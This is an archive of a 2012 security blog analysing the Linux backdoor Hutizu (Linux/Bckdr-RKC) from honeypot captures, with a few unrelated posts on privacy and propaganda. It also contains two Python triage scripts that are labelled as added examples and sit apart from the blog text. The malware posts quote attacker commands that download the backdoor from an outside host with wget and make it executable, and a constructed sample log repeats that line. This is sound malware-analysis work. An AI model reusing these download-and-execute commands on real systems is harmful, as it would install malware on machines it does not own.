January 18 is stop SOPA day. [1]Learn More...


1. http://sopablackout.org/learnmore


2.1.5 New @CaffSec Twitter Feature: #exploitAlert (2012-01-25 13:30)

I've taken the Google Alert zero day exploit feed and created automated Twitter notifications. You can get updated #exploitAlert notifications by following my Twitter account, [1]@CaffSec. The feed currently monitors Pastebin for new exploits. Expect additional feeds soon!
1. http://twitter.com/CaffSec

2.1.6 CaffSec SITREP - Cyber Intelligence for the masses (2012-01-27 16:22)

Leveraging the power of Google Alerts, I have started posting relevant news articles, public exploit releases, and other tidbits of information related to cyber security and information assurance. The best way to keep you and your organization prepared for unknown threats is to keep tabs on the current state of the security of the internet. There are currently three ways to view SITREP messages:
- Twitter, following [1]@CaffSec
- Tumblr, through the [2]CaffSec SITREP blog
- The [3]CaffSec Daily SITREP Online Newspaper
Please enjoy these valuable resources!
1. http://twitter.com/CaffSec 2. http://caffsec.tumblr.com/ 3. http://paper.li/CaffSec/1327635218

2.2 February

2.2.1 UPDATED: Hutizu and Linux/Bckdr-RKC now have limited detection (2012-02-17 19:01)

UPDATE: The latest news on Linux/Bckdr-RKC (.xsyslog) and Hutizu (.ssyslog) can be viewed [1]HERE, including the newest detection statistics. Thanks! It's been approximately 2 months since the original discovery of Linux/Bckdr-RKC. This Linux trojan is still undetected, according to VirusTotal.com:

VirusTotal: [2].xsyslog
VirusTotal: [3].ssyslog

In fact, it would appear that even Sophos is no longer detecting this trojan. I have resubmitted the file to multiple antivirus vendors, in hopes that they may pay attention to my submission this time. For those who aren't familiar with this trojan, an anonymous internet user has taken the time to put together a Pastebin post highlighting my research on this trojan: [4]http://pastebin.com/DwtX9dMd I'd also like to take the time to point out that you can view the decompiled source of this trojan at my malware research Google Code project: [5]http://code.google.com/p/caffsec-malware-analysis/ Keep fighting the good fight.
1. http://caffeinesecurity.blogspot.com/search/label/Linux%2FBckdr-RKC 2. https://www.virustotal.com/file/ce62318acfb28e7ad5c915b0bb7cbc256b5c682097d33d1a002ff856b21d7324/analysis/1329521280/ 3. https://www.virustotal.com/file/414a142016cab43d85c7b85a61426f0d3e3c2e04b9c3a9b94d88925593aaf49b/analysis/1329521356/ 4. http://pastebin.com/DwtX9dMd 5. http://code.google.com/p/caffsec-malware-analysis/

2.3 March

2.3.1 Coming Soon: Android for the Paranoid Article Series (2012-03-08 10:39)

I've decided to write a series of articles titled "Android for the Paranoid". The articles will be an in-depth look at some of the Android security related applications out there, and how they can be leveraged by you and your organization. If you have any apps you would like me to specifically look at, please post in the comments section below!

2.3.2 Have you checked out the free security magazines lately, available from Caffeine Security? (2012-03-09 15:59)

Have you checked out the "Latest Free IT Security Magazines and Downloads" box to the right? There are some really nice offers available right now, and none of these downloads and magazines cost a dime! They're just another free service offered by Caffeine Security. Access some great resources today! The full catalog of available resources is available here: [1]Complimentary Industry Resources
1. http://caffinesecurity-blogspot.tradepub.com/c/pubRD.mpl/?sr=ps&_t=ps:w_paraB: &ch=1091&_m=01.00ev.1.0.0&ct=Infosec&flt=all

2.3.3 Hutizu aka Linux/Bckdr-RKC and Duqu Links? Food for Thought. (2012-03-09 16:28)

I can't put my finger on it, but after looking at this article on the mystery of the [1]Duqu Framework, and looking at my publicly posted [2]decompilation of Linux/Bckdr-RKC, something strikes me as very familiar between the two. I've sent this to Kaspersky, so we'll see if they get back to me on it. Can you see any similarities? If so, please share! UPDATE: The virus in question is now being detected by a limited number of AV programs as the Hutizu backdoor.
1. http://www.securelist.com/en/blog/667/The_Mystery_of_the_Duqu_Framework 2. http://code.google.com/p/caffsec-malware-analysis/source/browse/#svn%2Ftrunk%2Fssyslog

2.3.4 Linux/Bckdr-RKC Delivery Method Analyzed (2012-03-10 11:55)

You can tell a lot about an attacker based upon their methods of attack.
- Automated attacks happen rapidly, with no time for typing
- Manual attacks happen slowly, as the attacker has to type commands
- Typos and misspellings indicate a manual attack
- The connection string will give away what kind of operating system the attacker is using
Let's take a look at both pieces of the Linux/Bckdr-RKC malware I've received.

.xsyslog
First seen 2011-12-21 11:56:26
User connected from 64.62.224.250 (This is a United States IP address, no host name)
User SSH client was SSH-2.0-libssh2 1.3.0
11:56:27: User downloaded .xsyslog to /etc/ using wget -P/etc/ http://216.83.44.229:99/.xsyslog
11:56:28: User granted executable permission using chmod 777 /etc/.xsyslog
11:56:28: User performed a cat /proc/version
14:04:06: User disconnected

.ssyslog
First seen 2011-12-24 06:54:03
User connected from 61.147.75.6 (This is a Chinese IP address, no host name)
User SSH client was SSH-2.0-libssh2 1.3.0
06:54:06: User downloaded .ssyslog to /etc/ using wget -P/etc/ http://216.83.44.229:99/.ssyslog
06:54:08: User granted executable permission using chmod 777 /etc/.ssyslog
06:54:09: User performed a cat /proc/version
06:55:42: User disconnected
08:53:24: User reconnected and retried above procedure from 61.147.75.6
09:01:49: User disconnected
10:37:44: User reconnected and retried above procedure from 61.147.75.6 (did not disconnect)
Then a second connection appears:
User connected from 87.217.199.83 (83.199.217.87.dynamic.jazztel.es - from Spain)
User SSH client was SSH-2.0-PuTTY Release 0.60
10:49:58: User connected and manually mistyped root password as 1234567
10:50:00: User re-entered correct root password as 123456
User proceeded to try and open common Linux text editors nano and pico
User attempted to install nano and pico using yum.
10:51:05: Frustrated, the user sent a reboot command
10:51:23: 87.217.199.83 disconnects
10:57:36: 61.147.75.6 disconnects

What can we learn about the attacker from the above sequence of events?
- Both .xsyslog and .ssyslog were delivered by a libssh2 client, indicating a non-Windows system
- The remote install of .xsyslog and .ssyslog may be automated, due to the rapid entry of commands
- The remote install of .ssyslog was being monitored by its botmaster, who attempted to actually debug why the malware was not phoning home
- The botmaster/attacker has some working knowledge of how the .xsyslog and .ssyslog malware functions, and attempted to troubleshoot, indicating he/she is not simply a script kiddie using someone else's malware
- The botmaster is possibly located in Spain, or relayed through a compromised system in Spain
- The botmaster uses a Windows system, since the troubleshooting connection was performed using PuTTY.
Similarities between .xsyslog and its later counterpart, .ssyslog:
- Both pieces of malware were hosted by the same IP address.
- Both pieces of malware are placed in the /etc/ folder
- Both pieces of malware are executed by running /proc/version
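The four tells listed at the top of this post (cadence, typing errors, password retries, client banner) can be turned into a small classifier that runs over honeypot session logs. The following is an added example, not code from the blog or its honeypot: the log format is invented for the example, every line is constructed (TEST-NET addresses instead of the real ones above), and the known-command list and thresholds are assumptions to tune against your own data.

```python
"""Classify SSH honeypot sessions as scripted or hands-on-keyboard using the
signals the post lists: command cadence, typos, password retries and the
client banner.  Added example, not code from the blog.  The log format and
every line in SAMPLE_LOG are constructed; addresses are TEST-NET placeholders."""
from collections import defaultdict
from datetime import datetime
from statistics import median

# Commands seen often enough on a honeypot to serve as a spelling reference;
# near-misses (edit distance 1) are counted as typos.  Very short names can
# produce false positives, so keep the list to realistic multi-letter commands.
KNOWN_COMMANDS = {"cat", "wget", "chmod", "nano", "pico", "yum", "apt-get",
                  "reboot", "uname", "curl", "vi", "ps", "ls"}


def levenshtein(a, b):
    """Edit distance, used to spot mistyped command names."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def parse_log(text):
    """Lines are 'timestamp|session|src|event|detail'; group and sort by session."""
    sessions = defaultdict(list)
    for line in text.strip().splitlines():
        stamp, sid, src, event, detail = line.split("|", 4)
        sessions[sid].append((datetime.strptime(stamp, "%Y-%m-%d %H:%M:%S"), src, event, detail))
    for events in sessions.values():
        events.sort(key=lambda e: e[0])
    return sessions


def client_family(banner):
    if "PuTTY" in banner:
        return "PuTTY (interactive client, usually Windows)"
    if "libssh2" in banner:
        return "libssh2 (library; typical of scripted tooling)"
    if "OpenSSH" in banner:
        return "OpenSSH"
    return "unknown"


def classify_session(events):
    banner = next((d for _, _, e, d in events if e == "connect"), "")
    cmds = [(t, d) for t, _, e, d in events if e == "cmd"]
    gaps = [(b[0] - a[0]).total_seconds() for a, b in zip(cmds, cmds[1:])]
    typos = []
    for _, cmd in cmds:
        word = cmd.split()[0] if cmd.split() else ""
        if word and word not in KNOWN_COMMANDS and any(levenshtein(word, k) <= 1 for k in KNOWN_COMMANDS):
            typos.append(word)
    signals = []
    if typos:
        signals.append("mistyped commands")
    kinds = {e for _, _, e, _ in events}
    if "auth_fail" in kinds and "auth_ok" in kinds:
        signals.append("password retried")
    if gaps and median(gaps) > 2.0:          # a script does not pause between commands
        signals.append("slow command cadence")
    if "PuTTY" in banner:
        signals.append("interactive client")
    return {
        "src": events[0][1],
        "client": client_family(banner),
        "median_gap_s": median(gaps) if gaps else 0.0,
        "typos": typos,
        "signals": signals,
        "verdict": "manual" if signals else "automated",
    }


def analyze(text):
    return {sid: classify_session(events) for sid, events in parse_log(text).items()}


SAMPLE_LOG = """\
2011-12-21 11:56:26|A|203.0.113.10|connect|SSH-2.0-libssh2 1.3.0
2011-12-21 11:56:26|A|203.0.113.10|auth_ok|root
2011-12-21 11:56:27|A|203.0.113.10|cmd|wget -P/etc/ http://198.51.100.7:99/.xsyslog
2011-12-21 11:56:28|A|203.0.113.10|cmd|chmod 777 /etc/.xsyslog
2011-12-21 11:56:28|A|203.0.113.10|cmd|cat /proc/version
2011-12-21 14:04:06|A|203.0.113.10|disconnect|
2011-12-24 10:49:50|B|198.51.100.23|connect|SSH-2.0-PuTTY_Release_0.60
2011-12-24 10:49:58|B|198.51.100.23|auth_fail|root
2011-12-24 10:50:00|B|198.51.100.23|auth_ok|root
2011-12-24 10:50:20|B|198.51.100.23|cmd|nanoo /etc/.ssyslog
2011-12-24 10:50:35|B|198.51.100.23|cmd|pico /etc/.ssyslog
2011-12-24 10:50:50|B|198.51.100.23|cmd|yum install nano pico
2011-12-24 10:51:05|B|198.51.100.23|cmd|reboot
2011-12-24 10:51:23|B|198.51.100.23|disconnect|
"""

if __name__ == "__main__":
    for sid, result in analyze(SAMPLE_LOG).items():
        print(sid, result["verdict"], result["client"], result["signals"])
```

Session A comes out "automated" (libssh2, sub-second cadence, no typos) and session B "manual" on all four signals, mirroring the reasoning in the post; the individual signals are kept in the result so an analyst can see which tell fired rather than only the verdict.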

2.3.5 Mario 2012 - Help Raise Awareness! (2012-03-17 14:45)

Mario 2012 is a film and campaign by Caffeine Security that aims to make Mario the plumber famous, not to celebrate him, but to raise support for his arrest. Please watch the video, and support this awareness campaign!

2.3.6 Hutizu Under the Hood (2012-03-20 17:00)

Been looking at the STRINGS result of .ssyslog, which is now detected by a small number of AV vendors as Hutizu: [1]http://code.google.com/p/caffsec-malware-analysis/source/browse/trunk/ssyslog/ssyslog-strings.txt A few interesting items jumped out at me. First, here is a list of files which were associated with compiling .ssyslog:

util.h udp_flood.h syn_flood.h ack_flood.h dns_flood.h update.h getdns.h connect.h main.c types.h stddef.h time.h pthreadtypes.h stdint.h types.h time.h select.h socket.h sockaddr.h in.h stdio.h libio.h netdb.h globel.h ip.h udp.h tcp.h config.h ip.h

Second, I found this interesting tidbit:

GET / HTTP/1.1
User-Agent: huituzi-monitor
Accept: */*
host: about.huituzi.net

I've never heard of huituzi-monitor. Anyone? I also found that the malware performs some DNS checks using 8.8.8.8, which is Google's public DNS server. I assume this is for cross checking of external DNS references to internal ones? Finally, the following IP addresses are present in .ssyslog; however, they aren't present in the decompiled version. Their purpose is currently unknown. Based on the format, they are most likely subnet masks. Do you recognize any of these? Preliminary searching shows all of these IP address blocks are registered to China.

112.100.0.0 219.147.219.0 219.147.237.0 222.170.67.0 218.7.250.0 218.7.7.0 218.7.80.0 218.8.128.0 221.210.153.0 221.210.200.0 221.211.8.0 60.11.111.0 60.11.141.0 60.11.254.0 60.15.127.0 60.219.1.0 61.180.140.0 61.180.230.0 202.118.166.0 202.118.176.0 202.118.192.0 202.118.223.0 202.118.224.0 219.149.194.0 202.98.0.0 221.9.167.0 61.138.129.0 61.138.186.0 111.116.64.0 202.198.16.0 202.198.8.0 59.72.128.0 219.148.204.0 219.149.6.0 202.96.64.0 202.96.69.0 60.19.18.0 125.222.200.0 202.118.1.0 202.118.40.0
202.118.48.0 202.118.66.0 202.118.81.0 219.217.80.0 222.26.127.0 219.141.148.0 219.141.157.0 220.181.125.0 220.181.19.0 220.181.61.0 202.106.0.0 202.106.195.0 202.106.196.0 61.135.178.0 61.135.23.0 202.112.112.0 202.112.128.0 202.112.14.0 202.112.176.0 202.112.20.0 202.112.209.0 202.120.224.0 202.204.112.0 202.204.160.0 202.204.48.0 202.204.60.0 202.204.65.0 202.205.0.0 202.205.208.0 202.205.80.0 202.207.240.0 202.4.130.0 210.31.32.0 210.35.128.0 210.42.159.0 210.44.112.0 210.47.244.0 211.64.144.0 211.66.88.0 211.68.71.0 211.81.20.0 219.243.239.0 219.150.59.0 202.99.69.0 202.99.96.0 202.113.112.0 202.113.128.0 202.113.15.0 202.113.168.0 202.113.32.0
202.113.48.0 202.113.64.0 202.113.80.0 202.113.96.0 211.68.208.0 211.68.224.0 59.67.148.0 219.148.19.0 222.222.202.0 222.222.222.0 121.17.127.0 121.28.7.0 202.99.171.0 218.11.142.0 218.12.131.0 218.12.199.0 221.194.33.0 221.194.57.0 60.10.134.0 60.2.145.0 60.6.40.0 60.8.44.0 202.206.100.0 202.206.144.0 202.206.160.0 202.206.192.0 202.206.223.0 202.206.48.0 202.206.80.0 219.146.2.0 123.129.192.0 218.58.118.0 222.132.102.0 60.215.138.0 202.116.0.0 202.194.116.0 202.194.133.0 202.194.145.0 202.194.15.0 202.194.40.0 202.194.48.0 211.87.176.0 219.218.18.0 219.149.135.0 121.30.5.0 124.163.5.0 124.164.7.0 124.165.6.0 124.166.7.0 124.167.4.0
202.97.131.0 202.99.216.0 60.220.6.0 60.221.4.0 60.222.1.0 60.223.7.0 202.117.0.0 219.244.0.0 117.34.127.0 125.76.192.0 218.30.19.0 61.134.1.0 123.139.188.0 123.139.211.0 221.11.64.0 221.11.89.0 202.117.128.0 202.117.64.0 202.117.96.0 202.200.112.0 202.200.144.0 202.200.32.0 202.200.48.0 202.200.80.0 202.201.252.0 210.27.80.0 218.195.208.0 218.195.24.0 218.195.56.0 219.247.255.0 222.24.94.0 222.25.77.0 59.76.48.0 222.74.1.0 222.74.126.0 110.6.180.0 116.113.84.0 202.207.0.0 202.207.16.0 210.31.176.0 124.224.20.0 221.199.1.0 221.199.14.0 202.201.152.0 61.178.0.0 61.178.2.0 221.7.34.0 202.201.0.0 202.201.18.0 202.201.32.0
202.201.48.0 202.201.64.0 202.201.80.0 202.201.89.0 210.26.0.0 210.26.16.0 202.100.128.0 202.100.138.0 221.207.58.0 61.128.114.0 221.7.1.0 202.201.160.0 202.98.224.0 202.98.239.0 221.13.65.0 210.41.4.0 125.70.254.0 182.151.191.0 218.6.200.0 220.167.29.0 124.161.97.0 221.10.25.0 60.255.80.0 202.115.112.0 202.115.128.0 202.115.144.0 202.115.160.0 202.115.192.0 202.115.32.0 202.115.64.0 202.115.80.0 202.202.145.0 202.202.192.0 202.202.208.0 202.202.96.0 211.83.241.0 222.176.21.0 222.180.120.0 61.128.128.0 61.128.130.0 61.128.192.0 221.5.203.0 221.7.92.0 202.202.0.0 202.202.32.0 202.103.44.0 221.232.247.0 59.175.246.0 58.19.121.0 58.19.122.0
202.114.0.0 202.114.112.0 202.114.200.0 202.114.255.0 202.114.32.0 202.114.64.0 202.114.79.0 202.114.88.0 202.114.96.0 202.197.159.0 211.67.48.0 211.84.160.0 211.84.208.0 218.196.240.0 218.197.80.0 222.85.85.0 222.88.49.0 222.88.88.0 202.102.224.0 202.102.227.0 61.163.252.0 125.219.48.0 202.196.0.0 202.196.192.0 202.196.208.0 202.196.32.0 202.196.64.0 202.196.80.0 202.196.96.0 202.197.208.0 210.43.128.0 210.43.144.0 210.43.24.0 211.67.128.0 211.67.191.0 218.198.48.0 218.198.80.0 222.21.112.0 59.69.128.0 202.102.192.0 202.102.199.0 202.102.214.0 61.132.161.0 211.162.0.0 58.242.16.0 58.242.160.0 58.242.176.0 58.242.193.0 58.242.2.0 58.242.48.0
202.38.64.0 210.45.128.0 210.45.144.0 210.45.16.0 210.45.240.0 210.45.92.0 221.228.255.0 222.92.170.0 61.147.37.0 61.155.104.0 122.192.80.0 221.6.151.0 221.6.176.0 221.6.231.0 221.6.246.0 221.6.4.0 221.6.96.0 58.240.56.0 58.240.57.0 58.241.208.0 202.119.112.0 202.119.168.0 202.119.200.0 202.119.208.0 202.119.24.0 202.119.32.0 202.119.64.0 202.119.80.0 202.195.112.0 202.195.160.0 202.195.176.0 210.28.39.0 210.28.80.0 210.29.152.0 210.29.64.0 211.65.116.0 211.65.64.0 116.228.111.0 116.236.159.0 180.168.255.0 202.96.209.0 112.64.143.0 112.65.184.0 58.247.118.0 202.120.127.0 202.120.143.0 202.120.144.0 202.120.181.0 202.120.2.0 202.120.80.0
202.121.138.0 202.121.48.0 210.35.68.0 115.236.4.0 125.112.124.0 125.123.0.0 202.101.172.0 202.101.173.0 202.96.113.0 218.75.3.0 220.187.246.0 60.191.249.0 61.130.219.0 61.153.177.0 61.153.198.0 61.153.81.0 61.153.83.0 61.174.95.0 61.175.111.0 123.157.135.0 123.157.240.0 124.160.12.0 221.12.100.0 221.12.49.0 221.12.65.0 221.12.85.0 210.32.0.0 210.33.24.0 222.246.129.0 59.51.78.0 61.187.72.0 58.20.125.0 58.20.126.0 202.197.240.0 202.197.64.0 210.43.192.0 210.43.47.0 202.101.224.0 202.101.226.0 61.131.253.0 118.212.168.0 222.204.2.0 218.85.152.0 218.85.157.0 58.22.100.0 58.22.101.0 58.23.0.0 58.23.9.0 210.34.0.0 210.34.128.0
210.34.32.0 210.34.48.0 219.229.132.0 202.98.192.0 202.98.198.0 202.98.199.0 221.13.28.0 221.13.30.0 210.40.0.0 210.40.128.0 210.40.144.0 210.40.64.0 222.172.200.0 222.221.0.0 221.3.136.0 202.203.128.0 202.203.160.0 202.203.208.0 202.203.230.0 210.40.176.0 119.145.45.0 202.96.136.0 61.140.11.0 120.80.10.0 120.80.11.0 120.80.193.0 120.80.201.0 120.80.237.0 120.80.8.0 120.80.9.0 210.21.114.0 210.21.2.0 210.22.3.0 220.249.251.0 221.4.147.0 221.4.158.0 221.4.224.0 221.5.1.0 58.251.56.0 58.251.57.0 202.116.128.0 202.116.160.0 202.116.192.0 202.116.32.0 202.192.88.0 202.38.193.0 218.192.12.0 218.192.144.0 218.192.240.0 219.223.222.0
219.223.252.0 219.223.254.0 222.17.127.0 222.200.128.0 222.200.129.0 180.137.252.0 222.217.39.0 121.31.60.0 221.7.138.0 221.7.247.0 210.36.158.0 210.36.16.0 202.100.192.0 202.100.199.0 221.11.156.0 210.37.79.0

1. http://code.google.com/p/caffsec-malware-analysis/source/browse/trunk/ssyslog/ssyslog-strings.txt
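The three things pulled out of the strings dump by hand above (leftover source-file names, an embedded HTTP request, and a block of .0-terminated addresses) are exactly what a first-pass triage script should extract from any unknown ELF sample. The following is an added example, not the blog's code: SAMPLE_STRINGS is a constructed dump that reuses a handful of strings quoted in the post, and the file-name-to-capability mapping is an assumption about what such names usually indicate, not a finding about this sample.

```python
"""Triage a `strings` dump from an unknown ELF sample: capability hints from
compile-time file names, embedded HTTP request headers, and IPv4 address
blocks grouped by /16.  Added example, not code from the blog.  SAMPLE_STRINGS
is constructed; CAPABILITY_HINTS is an assumed mapping, not ground truth."""
import ipaddress
import re
from collections import Counter

CAPABILITY_HINTS = {
    "syn_flood": "TCP SYN flood",
    "ack_flood": "TCP ACK flood",
    "udp_flood": "UDP flood",
    "dns_flood": "DNS flood",
    "update": "self-update",
    "getdns": "DNS resolution",
}

IPV4_RE = re.compile(r"(?<![\d.])(?:\d{1,3}\.){3}\d{1,3}(?![\d.])")
SOURCE_FILE_RE = re.compile(r"\b([a-z0-9_]+)\.[ch]\b")
HTTP_HEADER_RE = re.compile(r"^(user-agent|host):\s*(\S+)", re.IGNORECASE | re.MULTILINE)


def capabilities(dump):
    """Map source-file names left in the binary to the capability they suggest."""
    names = set(SOURCE_FILE_RE.findall(dump))
    return sorted(CAPABILITY_HINTS[n] for n in names if n in CAPABILITY_HINTS)


def http_artifacts(dump):
    """User-Agent / Host values from any embedded HTTP request."""
    return {name.lower(): value for name, value in HTTP_HEADER_RE.findall(dump)}


def extract_ipv4(dump):
    """Syntactically valid IPv4 addresses, deduplicated, in order of appearance."""
    seen, found = set(), []
    for match in IPV4_RE.findall(dump):
        try:
            addr = ipaddress.IPv4Address(match)
        except ipaddress.AddressValueError:
            continue  # e.g. 300.1.2.3 looks like an address but is not one
        if addr not in seen:
            seen.add(addr)
            found.append(addr)
    return found


def network_like(addrs):
    """Addresses ending in .0 read as network bases rather than hosts."""
    return [a for a in addrs if int(a) & 0xFF == 0]


def summarize_by_prefix(addrs, prefix=16):
    """How many entries fall in each /prefix supernet (a quick ownership view)."""
    return Counter(str(ipaddress.ip_network(f"{a}/{prefix}", strict=False)) for a in addrs)


def triage(dump):
    addrs = extract_ipv4(dump)
    nets = network_like(addrs)
    return {
        "capabilities": capabilities(dump),
        "http": http_artifacts(dump),
        "ip_count": len(addrs),
        "network_like": [str(a) for a in nets],
        "hosts": [str(a) for a in addrs if a not in nets],
        "by_16": summarize_by_prefix(nets),
    }


# Constructed dump: a few strings quoted in the post plus two deliberate
# non-addresses (a bogus octet and a three-part version string).
SAMPLE_STRINGS = """\
util.h
udp_flood.h
syn_flood.h
ack_flood.h
dns_flood.h
update.h
getdns.h
main.c
stdio.h
GET / HTTP/1.1
User-Agent: huituzi-monitor
Accept: */*
host: about.huituzi.net
8.8.8.8
202.118.166.0
202.118.176.0
202.118.192.0
219.147.219.0
60.11.111.0
300.1.2.3
1.3.0
"""

if __name__ == "__main__":
    for key, value in triage(SAMPLE_STRINGS).items():
        print(f"{key}: {value}")
```

The /16 summary is what makes a long list like the one above digestible: instead of hundreds of lines, the analyst sees a handful of prefixes to look up in WHOIS, and the single host-style address (8.8.8.8) is separated from the network-style ones automatically.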

2.3.7 Hutizu and Linux/Bckdr-RKC Detection Statistics (2012-03-20 19:13)

Let's take a look at current detection statistics for Linux/Bckdr-RKC. The newer variant has been named the Hutizu backdoor by antivirus vendors.

.xsyslog - The original file placed on my honeypot. Commonly known as Linux/Bckdr-RKC or Linux/PKC
Metascan: 1/25 detection [1]http://www.metascan-online.com/results/ue9v7uz2yv9wvb36mdwr2s9hg3hss792
- Fortinet detects as Linux/PKC.A!tr.bdr
VirusTotal: 0/43 detection [2]https://www.virustotal.com/file/ce62318acfb28e7ad5c915b0bb7cbc256b5c682097d33d1a002ff856b21d7324/analysis/1332284106/
VirScan: 3/36 detection [3]http://r.virscan.org/report/a6769c90a8c3d519201c6cdee60eea5b.html
- Fortinet detects as Linux/PKC.A!tr.bdr
- Kaspersky detects as Backdoor.Linux.PKC.a
- Sophos detects as Linux/Bckdr-RKC

.ssyslog - The newer variant. Commonly known as Hutizu
Metascan: 3/25 detection [4]http://www.metascan-online.com/results/szab3gp39d91byh3z3ebuz64utld97m0
- ArcaVir detects as Linux.Hutizu.a
- Fortinet detects as Linux/Hutizu.A!tr.bdr
- Ikarus detects as Backdoor.Linux.Hutizu
VirusTotal: 7/43 detection [5]https://www.virustotal.com/file/414a142016cab43d85c7b85a61426f0d3e3c2e04b9c3a9b94d88925593aaf49b/analysis/1332284644/
- Comodo detects as UnclassifiedMalware
- Emsisoft detects as Backdoor.Linux.Hutizu!IK
- Fortinet detects as Linux/Hutizu.A!tr.bdr
- Ikarus detects as Backdoor.Linux.Hutizu
- Jiangmin detects as Backdoor/Linux.ab
- Kaspersky detects as Backdoor.Linux.Hutizu.a
- Sophos detects as Linux/Hutizu-A
VirScan: 8/36 detection [6]http://r.virscan.org/report/dac52b25964a8614bb02e119e828575c.html
- a-squared detects as Backdoor.Linux.Hutizu!IK
- ArcaVir detects as Linux.Hutizu.a
- Comodo detects as UnclassifiedMalware
- Fortinet detects as Linux/Hutizu.A!tr.bdr
- Ikarus detects as Backdoor.Linux.Hutizu
- Jiangmin detects as Backdoor/Linux.ab
- Kaspersky detects as Backdoor.Linux.Hutizu.a
- Sophos detects as Linux/Hutizu-A

This is good news, as it means anti-virus vendors are starting to detect this malware. But the bad news is, only a small fraction of AV vendors are detecting it!
1. http://www.metascan-online.com/results/ue9v7uz2yv9wvb36mdwr2s9hg3hss792 2. https://www.virustotal.com/file/ce62318acfb28e7ad5c915b0bb7cbc256b5c682097d33d1a002ff856b21d7324/analysis/1332284106/ 3. http://r.virscan.org/report/a6769c90a8c3d519201c6cdee60eea5b.html 4. http://www.metascan-online.com/results/szab3gp39d91byh3z3ebuz64utld97m0 5. https://www.virustotal.com/file/414a142016cab43d85c7b85a61426f0d3e3c2e04b9c3a9b94d88925593aaf49b/analysis/1332284644/ 6. http://r.virscan.org/report/dac52b25964a8614bb02e119e828575c.html

2.3.8 Hutizu/Huituzi - Follow the Gray Rabbit (2012-03-20 19:59)

When typing Huituzi (the Chinese phonetic originally found in .ssyslog) into Google Translate with phonetic typing for Chinese, huituzi translates into 灰兔子, which in Chinese apparently means Gray Rabbit. So, we now know the name of this amazing piece of malware. According to Wikipedia, in Chinese literature, rabbits accompany Chang'e (the Chinese moon goddess) on the Moon. Also associated with the Chinese New Year (or Lunar New Year), rabbits are one of the twelve celestial animals in the Chinese Zodiac for the Chinese calendar. A very interesting note: this malware was discovered in 2011, the Chinese year of the Metal Rabbit, or Jīnshǔ tù (金属兔). The question remains: how deep does this rabbit hole go? I'm updating all of my .ssyslog posts to include Hutizu since that is the official detection name.

2.3.9 Linux Processes Memory Layout, exit, and _exit C Functions (2012-03-21 18:35)

This is a great article from TheGeekStuff.com. Very relevant for those who analyze Linux malware. "In this article, we will discuss the memory layout of a process and the process terminating C functions." [1]Linux Processes Memory Layout, exit, and _exit C Functions
1. http://www.thegeekstuff.com/2012/03/linux-processes-memory-layout/#.T2pW0A12hVI.blogger

2.3.10 Flash Farce: The Dangers of Social Media Influencing Real World Actions (2012-03-22 17:30)

We're lucky it hasn't happened yet. Or maybe it has and we don't know it. We've all heard how flash mobs, protests such as Occupy Wall Street, and even revolutions such as the Arab Spring can be organized through social media such as Twitter or Facebook. Viral videos, trending Twitter hash tags, Change.org petitions, Facebook pages: all of these are tools used to help bring about social change. But how many people actually check the origins of a social change campaign or movement? And would it even do them any good? How would anyone know the true origins, or motivations, behind an online campaign? On the Internet, anyone can claim to be someone else. In fact, some people even have multiple identities online. Sometimes identities are compromised, and someone you thought was your friend from high school could suddenly be a scammer from Europe or Africa, claiming to need financial assistance after losing all their money overseas. Now, let's add one more evil twist to this plot. What if the people you are friends with on Twitter or Facebook don't even exist? What if these are false accounts controlled by a criminal organization, or a government? What if one of your friends has been replaced by someone with malicious intentions against you? Don't think it can happen? Ask the members of LulzSec, an offshoot of Anonymous. Their leader, Sabu, was arrested by the authorities, then cooperated to help identify and arrest the members of his own group. Now, consider the Arab Spring. Specifically, Libya. The government of Libya recognized that social media was being used to organize flash mob protests, and in response shut off the internet to the entire country. While this was one way to handle the protest, consider another, more sinister scenario. What if the government responded by organizing more protests? What if the government organized these flash mob protests in controlled locations with the military standing by to arrest or perhaps even kill the protesters shortly after they arrive?

Propaganda has long been a tool used in war. Why fight an enemy, when you can make the enemy fight among themselves? An invading country can take another through brute force, but why bother, if your losses can be significantly reduced by convincing the country's citizens that life would be better under your rule? If a Communist country desired to take over a Capitalist one, the best way to do so would not be through soldiers, tanks, planes, and missiles. The best way to take over a Capitalist country would be to appeal to the lower income earners, who undoubtedly struggle to make ends meet, and envy those who make more money than themselves. So, why not start an online movement in that country to distribute wealth and make everyone's income equal? Of course, the only way this would ever happen is if the government regulated and controlled everything. In a Capitalist country, this will never happen, because the owners of companies and corporations would never allow it. But once enough civil unrest has been seeded, it would be quite easy to begin invading the country with troops, promising a better life to its citizens, offering to liberate the country's citizens from their oppressive government. This would have an even higher chance of success if the country is in the middle of an economic crisis, with high unemployment and large amounts of debt. Promise everyone employment and equal pay under a new government-owned and controlled economy. Sounds scary, doesn't it? Think it could ever happen? It could be happening right now, somewhere in the world, and we might not even know it until the troops begin attacking, and the bombs begin falling from the sky. But by then, it may be too late. Social media is a useful tool, much like the hunting spear. Early man developed the hunting spear as a tool to kill animals for food. Then he turned around and used the same hunting spear as a weapon against his fellow man, to take his fellow man's food as well.

Consider the hunting spear the next time you see an online campaign or movement supporting a cause. Is the online campaign a tool, or a weapon?

2.3.11 Facebook Location Sharing Enabled by Default - Another Threat to your Privacy and Safety (2012-03-26 15:21)

[1] I noticed something disturbing today. Ever since about the 15th of March (I noticed this on some of my friends' posts going back to the 13th), my Facebook posts have started including my location. That's pretty disturbing, because I never enabled Facebook to share my location. It would seem Facebook has enabled this setting by default. If I wanted everyone to know where I am, I would have typed my location into my Facebook post. This really becomes problematic if I were to use Facebook while on vacation. Suddenly my posts will tell everyone I'm not home, and depending on my privacy settings, that's pretty much telling the world "hey, he's on vacation, go steal stuff from his house!". I've noticed most of my friends' posts are including this information as well. Facebook does provide instructions on disabling location sharing ([2]https://www.facebook.com/about/location), but it's not very clear whether these settings stick. I urge you, the next time you post on Facebook, to check whether there is a small gray box below your post which includes your approximate location. If there is, click the X inside that box to disable location sharing. Share this message with your friends and family on Facebook, and help them be safe online too!
1. http://2.bp.blogspot.com/-NCB-mZ1kusU/T3DAKLCzsNI/AAAAAAAAAJI/7rtwt9oup-A/s1600/clickthex.PNG 2. https://www.facebook.com/about/location

2.3.12 Executable and Linkable Format (ELF) Guide (2012-03-28 12:09)

Yesterday I found a very handy guide for understanding Linux ELF files. Great for malware analysis! Thought I would share it with everyone else. [1]http://www.acsu.buffalo.edu/%7Echarngda/elf.html
1. http://www.acsu.buffalo.edu/%7Echarngda/elf.html

